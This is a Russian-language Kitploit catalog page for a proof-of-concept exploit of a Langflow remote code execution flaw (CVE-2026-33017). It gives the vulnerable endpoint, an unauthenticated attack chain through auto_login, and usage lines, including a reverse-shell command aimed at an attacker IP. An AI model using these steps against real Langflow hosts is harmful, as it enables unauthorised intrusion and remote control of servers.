Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — Уязвимость в Langflow 1.8.1 и более ранних версиях позволяет удалённому неавторизованному злоумышленнику выполнять произвольные команды на хосте. | Kitploit
Инструменты/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

Уязвимость в Langflow 1.8.1 и более ранних версиях позволяет удалённому неавторизованному злоумышленнику выполнять произвольные команды на хосте.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33017-Langflow-RCE-PoC

Уязвимость в Langflow 1.8.1 и более ранних версиях позволяет удалённому неаутентифицированному злоумышленнику выполнять произвольные команды на хосте.

Описание

Конечная точка POST /api/v1/build_public_tmp/{flow_id}/flow позволяет любому пользователю собирать публичные флоу без аутентификации.

Передав необязательный параметр data, злоумышленник может переопределить сохранённый флоу собственным сконструированным определением, внедряя произвольный код Python в конфигурации узлов. Этот управляемый пользователем код выполняется через exec() без песочницы или проверок, что приводит к неаутентифицированному удалённому выполнению кода.

Затронутые версии

root@kitploit:~
Langflow 1.8.1 и более ранние версии

Возможности

  • Создание публичного флоу, если AUTO_LOGIN=true
  • Выполнение эксплойта: выполнение произвольных команд.
  • Обратная оболочка: запуск обратной оболочки на основе bash.

Предварительные требования

  • Целевой экземпляр Langflow имеет как минимум один публичный флоу (обычно в демо, чат-ботах или общих рабочих процессах)
  • UUID одного публичного флоу (можно получить из общих ссылок/URL-адресов)
  • Аутентификация не требуется

Когда AUTO_LOGIN=true (конфигурация по умолчанию), неаутентифицированный злоумышленник может выполнить все условия:

  • GET /api/v1/auto_login → получить токен суперпользователя
  • POST /api/v1/flows/ → создать публичный флоу
  • Запустить эксплойт через build_public_tmp без какой-либо аутентификации

Использование

root@kitploit:~
python cve-2026-33017.py <host> [options]

Параметры:

root@kitploit:~
-p PORT, --port PORT: SSH-порт (по умолчанию: 7860)

-id FLOW_ID, --flow_id FLOW_ID: ID публичного флоу (будет создан новый, если не указан)

-c COMMAND, --command COMMAND: Пользовательская команда для выполнения

--shell: Запустить обратную оболочку

--lhost LHOST: IP-адрес атакующего для обратной оболочки

--lport LPORT: Порт атакующего для обратной оболочки (по умолчанию: 4444)

-t TIMEOUT, --timeout TIMEOUT: Тайм-аут подключения в секундах (по умолчанию: 5)

Примеры:

Выполнить команду:

root@kitploit:~
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

Запустить обратную оболочку:

root@kitploit:~
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Ссылки

Консультация GitHub

NVD CVE-2026-33017

Medium

⚠️ Отказ от ответственности

Данный PoC предназначен только для образовательных и исследовательских целей. Используйте его на свой страх и риск. Автор не несёт ответственности за любое неправомерное использование или причинённый ущерб.

Скачать инструмент